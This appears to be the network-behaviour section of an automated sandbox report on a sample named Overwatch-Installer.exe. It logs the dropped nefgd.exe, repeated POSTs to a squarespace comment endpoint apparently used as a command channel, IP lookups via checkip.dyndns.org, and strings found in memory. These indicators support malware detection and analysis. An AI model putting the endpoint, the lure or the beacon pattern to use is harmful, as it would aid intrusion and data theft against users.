Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 332Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue

Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49717 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.5:49727 -> 198.185.159.177:443 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49752 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49753 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49778 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49780 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49779 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49793 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49794 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49795 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.5:49832 -> 198.185.159.177:443 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49835 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49836 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49839 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49840 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49864 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49865 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49866 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49868 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49892 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49895 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49924 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49929 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49930 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49931 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49955 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49957 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49956 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49969 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49970 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49971 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49968 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49982 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49983 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49988 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49986 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49990 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50011 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50010 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50037 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50035 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50036 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50038 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50045 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50063 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50064 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50065 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50090 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50092 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50091 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50094 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50093 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50097 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50096 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50120 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50122 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50121 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.5:50133 -> 198.185.159.177:443 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50148 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50149 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50150 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50153 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50154 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50175 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50179 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50178 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50177 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50181 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50183 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50204 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50208 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50214 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50224 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50225 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50226 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50227 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50223 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50230 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50231 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50232 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50269 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50270 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50272 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50271 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50279 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50280 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50281 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50282 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50307 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50308 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50310 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50309 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50335 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50336 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50337 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50338 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50339 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50349 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50348 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50356 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50364 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50365 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50367 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50379 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50381 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50380 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50378 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Code function: 4_2_00A6A09A recv,

4_2_00A6A09A

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: plantain-elk-b8pt.squarespace.com

Source: unknown

HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continueConnection: Keep-Alive

Source: Overwatch-Installer.exe, nefgd.exe.0.dr	String found in binary or memory: http://DynDns.com
Source: Overwatch-Installer.exe, nefgd.exe.0.dr	String found in binary or memory: http://Paltalk.com
Source: nefgd.exe, 00000004.00000002.2461942040.0000000002B50000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000004.00000002.2461942040.0000000002B8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000003631000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000004.00000002.2461942040.0000000002B50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Overwatch-Installer.exe, nefgd.exe.0.dr	String found in binary or memory: http://checkip.dyndns.org/E
Source: Overwatch-Installer.exe, 00000000.00000002.4463340564.0000000001198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.
Source: Overwatch-Installer.exe, 00000000.00000002.4463340564.0000000001198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.LinkId=42127
Source: Overwatch-Installer.exe, nefgd.exe.0.dr	String found in binary or memory: http://no-ip.com
Source: Overwatch-Installer.exe, nefgd.exe.0.dr	String found in binary or memory: http://scripts.sil.org/OFL
Source: Overwatch-Installer.exe, nefgd.exe.0.dr	String found in binary or memory: http://www.google.com/get/noto/
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd&
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd&)
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd&9
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd.
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd.G
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd.Z
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd.c
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd.w
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd2
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd2.
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd2E
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd2a
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd2t
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd6
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd60
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd67
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd6H
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd6R
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd6m
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd:
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd:O
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd:X
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd:l
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd:n
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdB
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdB%
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdB3
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdB=
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdBA
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdBG
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdBb
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdBe
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdF
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdF1
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdFM
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdFW
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdFa
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdJ
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdJ#
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdJK
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdJe
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdJg
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdJs
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdN
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdN2
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdN6
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdNW
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdR
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdR&
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdR;
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdRB
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdRL
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdRV
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdRq
